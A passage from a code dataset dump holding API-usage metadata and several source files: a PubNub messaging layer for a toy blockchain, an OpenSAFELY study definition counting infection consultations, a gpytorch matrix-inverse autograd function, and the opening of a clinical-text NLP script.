"usage_type": "call"}, {"api_name": "com.io.knet_IO", "line_number": 79, "usage_type": "name"}, {"api_name": "gc.collect", "line_number": 81, "usage_type": "call"}, {"api_name": "com.application.logic.reml.kinship.recodeSNPs_to_Dominance", "line_number": 84, 
"usage_type": "call"}, {"api_name": "com.application.logic.reml.kinship", "line_number": 84, "usage_type": "name"}, {"api_name": "com.io.knet_IO.writePLINK", "line_number": 87, "usage_type": "call"}, {"api_name": "com.io.knet_IO", "line_number": 87, "usage_type": "name"}, {"api_name": "shutil.copyfile", "line_number": 90, "usage_type": "call"}, {"api_name": "shutil.copyfile", "line_number": 91, "usage_type": "call"}, {"api_name": "com.io.knet_IO.loadPLINKPheno", "line_number": 109, "usage_type": "call"}, {"api_name": "com.io.knet_IO", "line_number": 109, "usage_type": "name"}, {"api_name": "com.application.utils.geno_qc.standardise_Genotypes", "line_number": 110, "usage_type": "call"}, {"api_name": "com.application.utils.geno_qc", "line_number": 110, "usage_type": "name"}, {"api_name": "com.application.logic.he.multi_he.HE_Multi_external", "line_number": 117, "usage_type": "call"}, {"api_name": "com.application.logic.he.multi_he", "line_number": 117, "usage_type": "name"}, {"api_name": "com.application.logic.he.multi_he.HE_Multi_residuals", "line_number": 118, "usage_type": "call"}, {"api_name": "com.application.logic.he.multi_he", "line_number": 118, "usage_type": "name"}, {"api_name": "com.io.knet_IO.loadKinshipLocations", "line_number": 135, "usage_type": "call"}, {"api_name": "com.io.knet_IO", "line_number": 135, "usage_type": "name"}, {"api_name": "com.io.knet_IO.load_N_fromGCTA_GRM", "line_number": 140, "usage_type": "call"}, {"api_name": "com.io.knet_IO", "line_number": 140, "usage_type": "name"}, {"api_name": "gc.collect", "line_number": 141, "usage_type": "call"}, {"api_name": "numpy.sum", "line_number": 143, "usage_type": "call"}, {"api_name": "com.io.knet_IO.loadGCTA_GRM", "line_number": 149, "usage_type": "call"}, {"api_name": "com.io.knet_IO", "line_number": 149, "usage_type": "name"}, {"api_name": "gc.collect", "line_number": 154, "usage_type": "call"}, {"api_name": "gc.collect", "line_number": 161, "usage_type": "call"}, {"api_name": "com.io.knet_IO.writeGCTA_GRM", "line_number": 164, "usage_type": "call"}, {"api_name": "com.io.knet_IO", "line_number": 164, "usage_type": "name"}, {"api_name": "com.io.knet_IO.loadPLINK", "line_number": 177, "usage_type": "call"}, {"api_name": "com.io.knet_IO", "line_number": 177, "usage_type": "name"}, {"api_name": "gc.collect", "line_number": 181, "usage_type": "call"}, {"api_name": "com.application.utils.geno_qc.genoQC_all", "line_number": 184, "usage_type": "call"}, {"api_name": "com.application.utils.geno_qc", "line_number": 184, "usage_type": "name"}, {"api_name": "gc.collect", "line_number": 189, "usage_type": "call"}, {"api_name": "com.application.utils.geno_qc.computeMAFScore", "line_number": 196, "usage_type": "call"}, {"api_name": "com.application.utils.geno_qc", "line_number": 196, "usage_type": "name"}, {"api_name": "com.io.knet_IO.loadLDAKWeights", "line_number": 199, "usage_type": "call"}, {"api_name": "com.io.knet_IO", "line_number": 199, "usage_type": "name"}, {"api_name": "gc.collect", "line_number": 200, "usage_type": "call"}, {"api_name": "numpy.delete", "line_number": 202, "usage_type": "call"}, {"api_name": "numpy.nonzero", "line_number": 210, "usage_type": "call"}, {"api_name": "numpy.take", "line_number": 211, "usage_type": "call"}, {"api_name": "numpy.take", "line_number": 212, "usage_type": "call"}, {"api_name": "numpy.diag", "line_number": 214, "usage_type": "call"}, {"api_name": "com.application.logic.reml.kinship.calc_Kinship_Dominance", "line_number": 222, "usage_type": "call"}, {"api_name": 
"com.application.logic.reml.kinship", "line_number": 222, "usage_type": "name"}, {"api_name": "gc.collect", "line_number": 223, "usage_type": "call"}, {"api_name": "com.io.knet_IO.writeGCTA_GRM", "line_number": 225, "usage_type": "call"}, {"api_name": "com.io.knet_IO", "line_number": 225, "usage_type": "name"}, {"api_name": "gc.collect", "line_number": 226, "usage_type": "call"}, {"api_name": "com.application.utils.geno_qc.standardise_Genotypes", "line_number": 231, "usage_type": "call"}, {"api_name": "com.application.utils.geno_qc", "line_number": 231, "usage_type": "name"}, {"api_name": "com.application.logic.reml.kinship.calc_Kinship", "line_number": 232, "usage_type": "call"}, {"api_name": "com.application.logic.reml.kinship", "line_number": 232, "usage_type": "name"}, {"api_name": "com.io.knet_IO.writeGCTA_GRM", "line_number": 233, "usage_type": "call"}, {"api_name": "com.io.knet_IO", "line_number": 233, "usage_type": "name"}, {"api_name": "com.io.knet_IO.loadPLINKPheno", "line_number": 284, "usage_type": "call"}, {"api_name": "com.io.knet_IO", "line_number": 284, "usage_type": "name"}, {"api_name": "com.io.knet_IO.loadPLINK", "line_number": 286, "usage_type": "call"}, {"api_name": "com.io.knet_IO", "line_number": 286, "usage_type": "name"}, {"api_name": "gc.collect", "line_number": 289, "usage_type": "call"}, {"api_name": "com.application.utils.geno_qc.genoQC_all", "line_number": 291, "usage_type": "call"}, {"api_name": "com.application.utils.geno_qc", "line_number": 291, "usage_type": "name"}, {"api_name": "gc.collect", "line_number": 295, "usage_type": "call"}, {"api_name": "com.application.utils.geno_qc.standardise_Genotypes", "line_number": 296, "usage_type": "call"}, {"api_name": "com.application.utils.geno_qc", "line_number": 296, "usage_type": "name"}, {"api_name": "gc.collect", "line_number": 297, "usage_type": "call"}, {"api_name": "com.application.logic.reml.reml.computeBLUPs_RidgeBLUP", "line_number": 300, "usage_type": "call"}, {"api_name": "com.application.logic.reml.reml", "line_number": 300, "usage_type": "name"}, {"api_name": "gc.collect", "line_number": 302, "usage_type": "call"}, {"api_name": "com.io.knet_IO.loadPLINK", "line_number": 307, "usage_type": "call"}, {"api_name": "com.io.knet_IO", "line_number": 307, "usage_type": "name"}, {"api_name": "gc.collect", "line_number": 309, "usage_type": "call"}, {"api_name": "com.application.utils.geno_qc.removeList", "line_number": 310, "usage_type": "call"}, {"api_name": "com.application.utils.geno_qc", "line_number": 310, "usage_type": "name"}, {"api_name": "gc.collect", "line_number": 312, "usage_type": "call"}, {"api_name": "com.application.utils.geno_qc.standardise_Genotypes", "line_number": 313, "usage_type": "call"}, {"api_name": "com.application.utils.geno_qc", "line_number": 313, "usage_type": "name"}, {"api_name": "gc.collect", "line_number": 314, "usage_type": "call"}, {"api_name": "com.application.utils.geno_qc.getSizeInMBs", "line_number": 315, "usage_type": "call"}, {"api_name": "com.application.utils.geno_qc", "line_number": 315, "usage_type": "name"}, {"api_name": "com.application.logic.reml.reml.predictYhat", "line_number": 320, "usage_type": "call"}, {"api_name": "com.application.logic.reml.reml", "line_number": 320, "usage_type": "name"}, {"api_name": "com.io.knet_IO.loadPLINKPheno", "line_number": 349, "usage_type": "call"}, {"api_name": "com.io.knet_IO", "line_number": 349, "usage_type": "name"}, {"api_name": "com.io.knet_IO.loadPLINK", "line_number": 350, "usage_type": "call"}, {"api_name": 
"com.io.knet_IO", "line_number": 350, "usage_type": "name"}, {"api_name": "gc.collect", "line_number": 353, "usage_type": "call"}, {"api_name": "com.application.utils.geno_qc.genoQC_all", "line_number": 354, "usage_type": "call"}, {"api_name": "com.application.utils.geno_qc", "line_number": 354, "usage_type": "name"}, {"api_name": "gc.collect", "line_number": 358, "usage_type": "call"}, {"api_name": "com.application.utils.geno_qc.standardise_Genotypes", "line_number": 359, "usage_type": "call"}, {"api_name": "com.application.utils.geno_qc", "line_number": 359, "usage_type": "name"}, {"api_name": "gc.collect", "line_number": 360, "usage_type": "call"}, {"api_name": "com.application.logic.reml.reml.computeBLUPs_RidgeBLUP_morep", "line_number": 363, "usage_type": "call"}, {"api_name": "com.application.logic.reml.reml", "line_number": 363, "usage_type": "name"}, {"api_name": "com.application.logic.reml.reml.backCalculate_Beta_BLUP", "line_number": 364, "usage_type": "call"}, {"api_name": "com.application.logic.reml.reml", "line_number": 364, "usage_type": "name"}, {"api_name": "gc.collect", "line_number": 365, "usage_type": "call"}, {"api_name": "com.io.knet_IO.loadPLINK", "line_number": 370, "usage_type": "call"}, {"api_name": "com.io.knet_IO", "line_number": 370, "usage_type": "name"}, {"api_name": "gc.collect", "line_number": 372, "usage_type": "call"}, {"api_name": "com.application.utils.geno_qc.removeList", "line_number": 373, "usage_type": "call"}, {"api_name": "com.application.utils.geno_qc", "line_number": 373, "usage_type": "name"}, {"api_name": "gc.collect", "line_number": 375, "usage_type": "call"}, {"api_name": "com.application.utils.geno_qc.standardise_Genotypes", "line_number": 376, "usage_type": "call"}, {"api_name": "com.application.utils.geno_qc", "line_number": 376, "usage_type": "name"}, {"api_name": "gc.collect", "line_number": 377, "usage_type": "call"}, {"api_name": "com.application.utils.geno_qc.getSizeInMBs", "line_number": 378, "usage_type": "call"}, {"api_name": "com.application.utils.geno_qc", "line_number": 378, "usage_type": "name"}, {"api_name": "numpy.isnan", "line_number": 390, "usage_type": "call"}, {"api_name": "numpy.delete", "line_number": 396, "usage_type": "call"}, {"api_name": "numpy.delete", "line_number": 397, "usage_type": "call"}, {"api_name": "com.application.logic.reml.reml.predictYhat", "line_number": 403, "usage_type": "call"}, {"api_name": "com.application.logic.reml.reml", "line_number": 403, "usage_type": "name"}, {"api_name": "com.io.knet_IO.loadPLINKPheno", "line_number": 433, "usage_type": "call"}, {"api_name": "com.io.knet_IO", "line_number": 433, "usage_type": "name"}, {"api_name": "com.application.utils.geno_qc.standardise_Genotypes", "line_number": 434, "usage_type": "call"}, {"api_name": "com.application.utils.geno_qc", "line_number": 434, "usage_type": "name"}, {"api_name": "com.io.knet_IO.loadPLINK", "line_number": 438, "usage_type": "call"}, {"api_name": "com.io.knet_IO", "line_number": 438, "usage_type": "name"}, {"api_name": "com.application.utils.geno_qc.genoQC_all", "line_number": 441, "usage_type": "call"}, {"api_name": "com.application.utils.geno_qc", "line_number": 441, "usage_type": "name"}, {"api_name": "gc.collect", "line_number": 443, "usage_type": "call"}, {"api_name": "com.application.utils.geno_qc.standardise_Genotypes", "line_number": 444, "usage_type": "call"}, {"api_name": "com.application.utils.geno_qc", "line_number": 444, "usage_type": "name"}, {"api_name": "gc.collect", "line_number": 445, "usage_type": "call"}, 
{"api_name": "com.application.logic.reml.kinship.calc_Kinship", "line_number": 446, "usage_type": "call"}, {"api_name": "com.application.logic.reml.kinship", "line_number": 446, "usage_type": "name"}, {"api_name": "gc.collect", "line_number": 447, "usage_type": "call"}, {"api_name": "com.application.logic.reml.reml.REML_GWAS", "line_number": 448, "usage_type": "call"}, {"api_name": "com.application.logic.reml.reml", "line_number": 448, "usage_type": "name"}, {"api_name": "gc.collect", "line_number": 449, "usage_type": "call"}, {"api_name": "com.io.knet_IO.loadGCTA_GRM", "line_number": 453, "usage_type": "call"}, {"api_name": "com.io.knet_IO", "line_number": 453, "usage_type": "name"}, {"api_name": "gc.collect", "line_number": 455, "usage_type": "call"}, {"api_name": "com.application.logic.reml.reml.REML_GWAS", "line_number": 457, "usage_type": "call"}, {"api_name": "com.application.logic.reml.reml", "line_number": 457, "usage_type": "name"}, {"api_name": "com.io.knet_IO.loadEigenSum", "line_number": 461, "usage_type": "call"}, {"api_name": "com.io.knet_IO", "line_number": 461, "usage_type": "name"}, {"api_name": "com.application.logic.reml.reml.REML_GWAS", "line_number": 462, "usage_type": "call"}, {"api_name": "com.application.logic.reml.reml", "line_number": 462, "usage_type": "name"}, {"api_name": "com.application.logic.reml.reml.h2_SE_approx2", "line_number": 468, "usage_type": "call"}, {"api_name": "com.application.logic.reml.reml", "line_number": 468, "usage_type": "name"}, {"api_name": "com.io.knet_IO.writeEigenSum", "line_number": 481, "usage_type": "call"}, {"api_name": "com.io.knet_IO", "line_number": 481, "usage_type": "name"}, {"api_name": "com.io.knet_IO.loadRegionData", "line_number": 493, "usage_type": "call"}, {"api_name": "com.io.knet_IO", "line_number": 493, "usage_type": "name"}, {"api_name": "com.io.knet_IO.loadLDAKRegionsDeltas", "line_number": 498, "usage_type": "call"}, {"api_name": "com.io.knet_IO", "line_number": 498, "usage_type": "name"}, {"api_name": "com.io.knet_IO.loadLDAKRegions", "line_number": 499, "usage_type": "call"}, {"api_name": "com.io.knet_IO", "line_number": 499, "usage_type": "name"}, {"api_name": "com.io.knet_IO.loadSummaryStats", "line_number": 504, "usage_type": "call"}, {"api_name": "com.io.knet_IO", "line_number": 504, "usage_type": "name"}, {"api_name": "pathlib.Path", "line_number": 519, "usage_type": "call"}, {"api_name": "com.io.knet_IO.loadMatrixFromDisk", "line_number": 525, "usage_type": "call"}, {"api_name": "com.io.knet_IO", "line_number": 525, "usage_type": "name"}, {"api_name": "com.application.logic.knet.knet_manager.runKnet", "line_number": 533, "usage_type": "call"}, {"api_name": "com.application.logic.knet.knet_manager", "line_number": 533, "usage_type": "name"}, {"api_name": "gc.collect", "line_number": 534, "usage_type": "call"}, {"api_name": "com.application.utils.plotgen.exportNNPlot", "line_number": 557, "usage_type": "call"}, {"api_name": "com.application.utils.plotgen", "line_number": 557, "usage_type": "name"}, {"api_name": "com.io.knet_IO.writeMatrixToDisk", "line_number": 600, "usage_type": "call"}, {"api_name": "com.io.knet_IO", "line_number": 600, "usage_type": "name"}, {"api_name": "com.io.knet_IO.loadPLINK", "line_number": 624, "usage_type": "call"}, {"api_name": "com.io.knet_IO", "line_number": 624, "usage_type": "name"}, {"api_name": "com.io.knet_IO.loadPLINKPheno", "line_number": 626, "usage_type": "call"}, {"api_name": "com.io.knet_IO", "line_number": 626, "usage_type": "name"}, {"api_name": 
"com.application.logic.scanner.scanner.findRegions", "line_number": 629, "usage_type": "call"}, {"api_name": "com.application.logic.scanner.scanner", "line_number": 629, "usage_type": "name"}, {"api_name": "com.io.knet_IO.writeRegionData", "line_number": 637, "usage_type": "call"}, {"api_name": "com.io.knet_IO", "line_number": 637, "usage_type": "name"}, {"api_name": "pathlib.Path", "line_number": 665, "usage_type": "call"}, {"api_name": "com.io.knet_IO.loadRegionData", "line_number": 668, "usage_type": "call"}, {"api_name": "com.io.knet_IO", "line_number": 668, "usage_type": "name"}, {"api_name": "com.application.logic.scanner.scanner.concatRegions", "line_number": 673, "usage_type": "call"}, {"api_name": "com.application.logic.scanner.scanner", "line_number": 673, "usage_type": "name"}, {"api_name": "com.io.knet_IO.writeRegionData", "line_number": 676, "usage_type": "call"}, {"api_name": "com.io.knet_IO", "line_number": 676, "usage_type": "name"}, {"api_name": "argparse.ArgumentParser", "line_number": 683, "usage_type": "call"}]} +{"seq_id": "232854306", "text": "'''PubNub file'''\nimport os\nimport time\n\nfrom pubnub.callbacks import SubscribeCallback\nfrom pubnub.pnconfiguration import PNConfiguration\nfrom pubnub.pubnub import PubNub\nfrom python_settings import settings\n\nfrom backend.blockchain.block import Block\n\nos.environ[\"SETTINGS_MODULE\"] = 'settings'\n\npnconfig = PNConfiguration()\npnconfig.subscribe_key = settings.SUBSCRIBE_KEY\npnconfig.publish_key = settings.PUBLISH_KEY\npubnub = PubNub(pnconfig)\n\nCHANNELS = {\n \"TEST\": \"TEST\",\n \"BLOCK\": \"BLOCK\"\n}\n\n\nclass Listener(SubscribeCallback):\n \"\"\"Listener class\"\"\"\n def __init__(self, blockchain):\n \"\"\"Initialize\"\"\"\n self.blockchain = blockchain\n\n def message(self, pubnub, message_object):\n \"\"\"Message\"\"\"\n print(\"\\n Channel: {} | Message: {}\".format(message_object.channel, message_object.message)) # noqa: E501\n\n if message_object.channel == CHANNELS[\"BLOCK\"]:\n block = Block.from_json(message_object.message)\n potential_chain = self.blockchain.chain[:]\n potential_chain.append(block)\n\n try:\n self.blockchain.replace_chain(potential_chain)\n print(\"\\n -- Successfully replaced local chain\")\n except Exception as error: # pylint: disable=broad-except\n print(\"\\n -- Did not replace a chain : {}\".format(error))\n\n\nclass PubSub():\n \"\"\"\n Handles the publish/subscribe layer of the application.\n Provides communication between the nodes of the blockchain network.\n \"\"\"\n\n def __init__(self, blockchain):\n \"\"\"Init\"\"\"\n self.pubnub = PubNub(pnconfig)\n self.pubnub.subscribe().channels(CHANNELS.values()).execute()\n self.pubnub.add_listener(Listener(blockchain))\n\n def publish(self, channel, message):\n \"\"\"Publish the message object to the channel.\"\"\"\n self.pubnub.publish().channel(channel).message(message).sync()\n\n def broadcast_block(self, block):\n \"\"\"Broadcast a block object to all nodes.\"\"\"\n self.publish(CHANNELS[\"BLOCK\"], block.to_json())\n\n\ndef main():\n \"\"\"Main\"\"\"\n pubsub = PubSub()\n\n time.sleep(1)\n pubsub.publish(CHANNELS[\"TEST\"], {\"foo\": \"bar\"})\n\n\nif __name__ == \"__main__\":\n main()\n", "sub_path": "backend/pubsub.py", "file_name": "pubsub.py", "file_ext": "py", "file_size_in_byte": 2220, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "13", "api": [{"api_name": "os.environ", "line_number": 12, "usage_type": "attribute"}, {"api_name": 
"pubnub.pnconfiguration.PNConfiguration", "line_number": 14, "usage_type": "call"}, {"api_name": "python_settings.settings.SUBSCRIBE_KEY", "line_number": 15, "usage_type": "attribute"}, {"api_name": "python_settings.settings", "line_number": 15, "usage_type": "name"}, {"api_name": "python_settings.settings.PUBLISH_KEY", "line_number": 16, "usage_type": "attribute"}, {"api_name": "python_settings.settings", "line_number": 16, "usage_type": "name"}, {"api_name": "pubnub.callbacks", "line_number": 17, "usage_type": "name"}, {"api_name": "pubnub.pubnub.PubNub", "line_number": 17, "usage_type": "call"}, {"api_name": "pubnub.callbacks.SubscribeCallback", "line_number": 25, "usage_type": "name"}, {"api_name": "backend.blockchain.block.Block.from_json", "line_number": 36, "usage_type": "call"}, {"api_name": "backend.blockchain.block.Block", "line_number": 36, "usage_type": "name"}, {"api_name": "pubnub.pubnub.PubNub", "line_number": 55, "usage_type": "call"}, {"api_name": "time.sleep", "line_number": 72, "usage_type": "call"}]} +{"seq_id": "348045179", "text": "######################################\n\n# This script provides the formal specification of the study data that will be extracted from\n# the OpenSAFELY database.\n# 17 Mar 2022 updated: infection history refer to first date of infection instead of index date\n\n######################################\n\n# --- IMPORT STATEMENTS ---\n\n## Import code building blocks from cohort extractor package\nfrom cohortextractor import (\n StudyDefinition,\n patients,\n #codelist_from_csv,\n codelist,\n filter_codes_by_category,\n #combine_codelists,\n Measure\n)\n\n## Import codelists from codelist.py (which pulls them from the codelist folder)\n\nfrom codelists import *\n\n\n#from codelists import antibacterials_codes, broad_spectrum_antibiotics_codes, uti_codes, lrti_codes, ethnicity_codes, bmi_codes, any_primary_care_code, clear_smoking_codes, unclear_smoking_codes, flu_med_codes, flu_clinical_given_codes, flu_clinical_not_given_codes, covrx_code, hospitalisation_infection_related #, any_lrti_urti_uti_hospitalisation_codes#, flu_vaccine_codes\n\n# DEFINE STUDY POPULATION ---\n\n## Define study time variables\nfrom datetime import datetime\n\nstart_date = \"2019-01-01\"\nend_date = datetime.today().strftime('%Y-%m-%d')\n\n## Define study population and variables\nstudy = StudyDefinition(\n\n # Configure the expectations framework\n default_expectations={\n \"date\": {\"earliest\": start_date, \"latest\": end_date},\n \"rate\": \"uniform\",\n \"incidence\": 0.1,\n },\n # Set index date to start date\n index_date=start_date,\n # Define the study population\n population=patients.satisfying(\n \"\"\"\n NOT has_died\n AND\n registered\n AND\n age\n AND\n has_follow_up_previous_year\n AND\n (sex = \"M\" OR sex = \"F\")\n \"\"\",\n\n has_died=patients.died_from_any_cause(\n on_or_before=\"index_date\",\n returning=\"binary_flag\",\n ),\n\n registered=patients.satisfying(\n \"registered_at_start\",\n registered_at_start=patients.registered_as_of(\"index_date\"),\n ),\n\n has_follow_up_previous_year=patients.registered_with_one_practice_between(\n start_date=\"index_date - 1 year\",\n end_date=\"index_date\",\n return_expectations={\"incidence\": 0.95},\n ),\n\n ),\n\n ########## patient demographics to group_by for measures:\n ### Age\n age=patients.age_as_of(\n \"index_date\",\n return_expectations={\n \"rate\": \"universal\",\n \"int\": {\"distribution\": \"population_ages\"},\n \"incidence\": 0.001\n },\n ),\n\n ### Age categories\n\n ## 0-4; 5-14; 15-24; 
25-34; 35-44; 45-54; 55-64; 65-74; 75+\n    age_cat=patients.categorised_as(\n        {\n            \"0\":\"DEFAULT\",\n            \"0-4\": \"\"\" age >= 0 AND age < 5\"\"\",\n            \"5-14\": \"\"\" age >= 5 AND age < 15\"\"\",\n            \"15-24\": \"\"\" age >= 15 AND age < 25\"\"\",\n            \"25-34\": \"\"\" age >= 25 AND age < 35\"\"\",\n            \"35-44\": \"\"\" age >= 35 AND age < 45\"\"\",\n            \"45-54\": \"\"\" age >= 45 AND age < 55\"\"\",\n            \"55-64\": \"\"\" age >= 55 AND age < 65\"\"\",\n            \"65-74\": \"\"\" age >= 65 AND age < 75\"\"\",\n            \"75+\": \"\"\" age >= 75 AND age < 120\"\"\",\n        },\n        return_expectations={\n            \"rate\": \"universal\",\n            \"category\": {\n                \"ratios\": {\n                    \"0\": 0,\n                    \"0-4\": 0.12, \n                    \"5-14\": 0.11,\n                    \"15-24\": 0.11,\n                    \"25-34\": 0.11,\n                    \"35-44\": 0.11,\n                    \"45-54\": 0.11,\n                    \"55-64\": 0.11,\n                    \"65-74\": 0.11,\n                    \"75+\": 0.11,\n                }\n            },\n        },\n    ),\n\n    \n    ### Sex\n    sex=patients.sex(\n        return_expectations={\n            \"rate\": \"universal\",\n            \"category\": {\"ratios\": {\"M\": 0.49, \"F\": 0.51}},\n        }\n    ),\n\n\n    ### Practice\n    practice=patients.registered_practice_as_of(\n        \"index_date\",\n        returning=\"pseudo_id\",\n        return_expectations={\"int\": {\"distribution\": \"normal\",\n                                     \"mean\": 25, \"stddev\": 5}, \"incidence\": 1}\n    ),\n\n\n\n    # find patient's first infection date \n    indic_date_1=patients.with_these_clinical_events(\n        all_indication_codes,\n        returning='date',\n        between=[\"index_date\", \"last_day_of_month(index_date)\"],\n        find_first_match_in_period=True,\n        date_format=\"YYYY-MM-DD\", \n        return_expectations={\"date\": {\"index_date\": \"last_day_of_month(index_date)\"}},\n    ),\n\n    # AB_date_1=patients.with_these_medications(\n    #     antibacterials_codes_brit,\n    #     returning='date',\n    #     between=[\"index_date\", \"last_day_of_month(index_date)\"],\n    #     find_first_match_in_period=True,\n    #     date_format=\"YYYY-MM-DD\", \n    # ),\n\n    ########## any infection or any AB records in prior 90days (incident/prevalent prescribing)#############\n    ## 0=incident case / 1=prevalent\n    hx_indications=patients.with_these_clinical_events(\n        all_indication_codes,\n        returning=\"binary_flag\",\n        between=[\"indic_date_1 - 90 days\", \"indic_date_1 - 1 day\"],\n        find_first_match_in_period=True,\n        return_expectations={\"incidence\": 0.1, \"date\": {\"earliest\": \"first_day_of_month(index_date) - 42 days\"}}\n    ),\n    \n    # hx_antibiotics= patients.with_these_medications(\n    #     antibacterials_codes_brit,\n    #     between=[\"AB_date_1 - 90 days\", \"AB_date_1 - 1 day\"],\n    #     returning='binary_flag',\n    #     return_expectations={\"incidence\": 0.1, \"date\": {\"earliest\": start_date}},\n    # ),\n\n    \n    ########## number of infection consultations #############\n    \n    ## count infection events \n    indication_counts=patients.with_these_clinical_events(\n        all_indication_codes,\n        returning=\"number_of_matches_in_period\",\n        between=[\"indic_date_1\", \"last_day_of_month(index_date)\"],\n        return_expectations={\n            \"int\" : {\"distribution\": \"normal\", \"mean\": 5, \"stddev\": 1},\"incidence\":0.2}\n    ),\n\n    ## all antibacterials from BRIT (dmd codes)\n    # antibacterial_brit=patients.with_these_medications(\n    #     antibacterials_codes_brit,\n    #     between=[\"AB_date_1\", \"last_day_of_month(index_date)\"],\n    #     returning=\"number_of_matches_in_period\",\n    #     return_expectations={\n    #         \"int\": {\"distribution\": \"normal\", \"mean\": 3, \"stddev\": 1},\n    #         \"incidence\": 1,\n    #     },\n    # ),\n\n\n\n)\n\n# --- DEFINE MEASURES ---\n\n\nmeasures = [\n\n\n    Measure(id=\"indication_counts\",\n            numerator=\"indication_counts\",\n            denominator=\"population\",\n            group_by=[\"practice\", 
\"hx_indications\", \"age_cat\"]\n ),\n\n # Measure(id=\"ab_count_all\",\n # numerator=\"antibacterial_brit\",\n # denominator=\"population\",\n # group_by=[\"practice\", \"hx_antibiotics\", \"age_cat\"]\n # ),\n\n\n]\n", "sub_path": "analysis/study_definition_indication.py", "file_name": "study_definition_indication.py", "file_ext": "py", "file_size_in_byte": 6962, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "13", "api": [{"api_name": "datetime.datetime.today", "line_number": 35, "usage_type": "call"}, {"api_name": "datetime.datetime", "line_number": 35, "usage_type": "name"}, {"api_name": "cohortextractor.StudyDefinition", "line_number": 38, "usage_type": "call"}, {"api_name": "cohortextractor.patients.satisfying", "line_number": 49, "usage_type": "call"}, {"api_name": "cohortextractor.patients", "line_number": 49, "usage_type": "name"}, {"api_name": "cohortextractor.patients.died_from_any_cause", "line_number": 62, "usage_type": "call"}, {"api_name": "cohortextractor.patients", "line_number": 62, "usage_type": "name"}, {"api_name": "cohortextractor.patients.satisfying", "line_number": 67, "usage_type": "call"}, {"api_name": "cohortextractor.patients", "line_number": 67, "usage_type": "name"}, {"api_name": "cohortextractor.patients.registered_as_of", "line_number": 69, "usage_type": "call"}, {"api_name": "cohortextractor.patients", "line_number": 69, "usage_type": "name"}, {"api_name": "cohortextractor.patients.registered_with_one_practice_between", "line_number": 72, "usage_type": "call"}, {"api_name": "cohortextractor.patients", "line_number": 72, "usage_type": "name"}, {"api_name": "cohortextractor.patients.age_as_of", "line_number": 82, "usage_type": "call"}, {"api_name": "cohortextractor.patients", "line_number": 82, "usage_type": "name"}, {"api_name": "cohortextractor.patients.categorised_as", "line_number": 94, "usage_type": "call"}, {"api_name": "cohortextractor.patients", "line_number": 94, "usage_type": "name"}, {"api_name": "cohortextractor.patients.sex", "line_number": 128, "usage_type": "call"}, {"api_name": "cohortextractor.patients", "line_number": 128, "usage_type": "name"}, {"api_name": "cohortextractor.patients.registered_practice_as_of", "line_number": 137, "usage_type": "call"}, {"api_name": "cohortextractor.patients", "line_number": 137, "usage_type": "name"}, {"api_name": "cohortextractor.patients.with_these_clinical_events", "line_number": 147, "usage_type": "call"}, {"api_name": "cohortextractor.patients", "line_number": 147, "usage_type": "name"}, {"api_name": "cohortextractor.patients.with_these_clinical_events", "line_number": 166, "usage_type": "call"}, {"api_name": "cohortextractor.patients", "line_number": 166, "usage_type": "name"}, {"api_name": "cohortextractor.patients.with_these_clinical_events", "line_number": 185, "usage_type": "call"}, {"api_name": "cohortextractor.patients", "line_number": 185, "usage_type": "name"}, {"api_name": "cohortextractor.Measure", "line_number": 214, "usage_type": "call"}]} +{"seq_id": "109372260", "text": "import torch\nfrom torch.autograd import Function\nfrom gpytorch.utils import LinearCG\n\n\n# Returns input_1^{-1} input_2\nclass Invmm(Function):\n def forward(self, matrix, input_2):\n res = LinearCG().solve(matrix, input_2)\n if res.ndimension() == 1:\n res.unsqueeze_(1)\n self.save_for_backward(matrix, input_2, res)\n return res\n\n def backward(self, grad_output):\n matrix, input_2, input_1_t_input_2 = self.saved_tensors\n grad_input_1 = None\n grad_input_2 = 
None\n\n        # input_1 gradient\n        if self.needs_input_grad[0]:\n            grad_input_1 = torch.mm(grad_output, input_1_t_input_2.t())\n            grad_input_1 = LinearCG().solve(matrix, grad_input_1)\n            grad_input_1 = grad_input_1.mul_(-1)\n\n        # input_2 gradient\n        if self.needs_input_grad[1]:\n            grad_input_2 = LinearCG().solve(matrix, grad_output)\n\n        return grad_input_1, grad_input_2\n\n    def __call__(self, input_1_var, input_2_var):\n        res = super(Invmm, self).__call__(input_1_var, input_2_var)\n        return res\n", "sub_path": "gpytorch/math/functions/invmm.py", "file_name": "invmm.py", "file_ext": "py", "file_size_in_byte": 1086, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "13", "api": [{"api_name": "torch.autograd.Function", "line_number": 7, "usage_type": "name"}, {"api_name": "gpytorch.utils.LinearCG", "line_number": 9, "usage_type": "call"}, {"api_name": "torch.mm", "line_number": 22, "usage_type": "call"}, {"api_name": "gpytorch.utils.LinearCG", "line_number": 23, "usage_type": "call"}, {"api_name": "gpytorch.utils.LinearCG", "line_number": 28, "usage_type": "call"}]} +{"seq_id": "426019954", "text": "import xml.etree.cElementTree as ET\nimport pprint\nimport os\nimport re\nimport pyConTextNLP.pyConTextGraph as pyConText\nimport pyConTextNLP.itemData as itemData\nimport urllib.request\nimport networkx as nx\nfrom textblob import TextBlob\nimport pyConTextNLP.display.html as html\nfrom IPython.display import display, HTML\n\n# weird cTakes disease recognitions to be excluded\nEXCLUDE_DISEASE_REGEX = [\n    re.compile(r'^[\\W]*disease[\\W]*$',re.IGNORECASE),\n    re.compile(r'^[\\W]*all[\\W]*$',re.IGNORECASE),\n    re.compile(r'^[\\W]*plan[\\W]*$',re.IGNORECASE)\n    ]\n\n# treatments that are not meaningful need to be excluded\n# TODO: need to combine procedures before excluding any!\nEXCLUDE_TREATMENT_REGEX = [\n    re.compile(r'^\\s*support\\s*$',re.IGNORECASE),\n    re.compile(r'^\\s*treatment\\s*$',re.IGNORECASE),\n    re.compile(r'^\\s*replacement\\s*$',re.IGNORECASE),\n    re.compile(r'^\\s*therapy\\s*$',re.IGNORECASE),\n    re.compile(r'^\\s*surgical\\s*$',re.IGNORECASE)\n    ]\n\n# regexes for gender determination\nMALE_REGEX = [\n    re.compile(r'\\bhe\\b',re.IGNORECASE),\n    re.compile(r'\\bhis\\b',re.IGNORECASE),\n    re.compile(r'\\bmr\\b',re.IGNORECASE),\n    re.compile(r'\\bmale\\b',re.IGNORECASE),\n    re.compile(r'\\bhim\\b',re.IGNORECASE),\n    re.compile(r'\\bman\\b',re.IGNORECASE),\n    re.compile(r'\\bgentleman\\b',re.IGNORECASE),\n    re.compile(r'\\bsir\\b',re.IGNORECASE)\n    ]\nFEMALE_REGEX = [\n    